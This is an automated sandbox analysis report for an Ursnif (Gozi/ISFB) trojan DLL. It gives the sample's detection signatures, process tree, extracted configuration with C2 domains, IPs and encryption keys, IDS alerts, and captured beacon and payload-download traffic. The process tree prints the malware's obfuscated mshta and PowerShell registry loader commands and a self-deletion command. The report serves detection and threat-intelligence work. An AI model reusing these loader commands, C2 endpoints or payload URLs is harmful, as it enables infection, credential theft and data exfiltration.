Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2oCOO5LbPu.dll

Overview

General Information

Sample Name:2oCOO5LbPu.dll
Analysis ID:620323
MD5:1217ff59e80cdae525287f2c6e9a43c6
SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4640 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2284 cmdline: rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4040 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5016 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • nslookup.exe (PID: 5996 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
            • cmd.exe (PID: 3248 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4724 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5472 cmdline: cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4960 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
          • rundll32.exe (PID: 5180 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6576 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 46 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.52f94a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.52f94a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.2.rundll32.exe.36d0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.586a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.5916b40.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-16:19:17.575336 05/04/22-16:19:17.575336
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:22.118696 05/04/22-16:21:22.118696
                      SID:2823044
                      Source Port:49824
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:19:19.326271 05/04/22-16:19:19.326271
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:18:57.385228 05/04/22-16:18:57.385228
                      SID:2033203
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:20.986284 05/04/22-16:21:20.986284
                      SID:2031743
                      Source Port:49823
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:21.354584 05/04/22-16:21:21.354584
                      SID:2031744
                      Source Port:49823
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:23.154439 05/04/22-16:21:23.154439
                      SID:2823044
                      Source Port:49825
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:19:18.765869 05/04/22-16:19:18.765869
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:35.078524 05/04/22-16:21:35.078524
                      SID:2831962
                      Source Port:49836
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:21:37.325898 05/04/22-16:21:37.325898
                      SID:2831962
                      Source Port:49845
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://193.56.146.127/stilak32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gifAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/stilak64.rarAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook32.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmpAvira URL Cloud: Label: malware
                      Source: http://193.56.146.127/cook64.rarAvira URL Cloud: Label: malware
                      Source: http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmpAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: 2oCOO5LbPu.dllReversingLabs: Detection: 50%
                      Machine Learning detection for sample
                      Source: 2oCOO5LbPu.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: 2oCOO5LbPu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2031743 ET TROJAN Ursnif Payload Request (cook32.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2031744 ET TROJAN Ursnif Payload Request (cook64.rar) 192.168.2.4:49823 -> 193.56.146.127:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49824 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49825 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49836 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49845 -> 116.121.62.237:80
                      Source: TrafficSnort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49845 -> 116.121.62.237:80
                      Uses nslookup.exe to query domains
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machine
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache
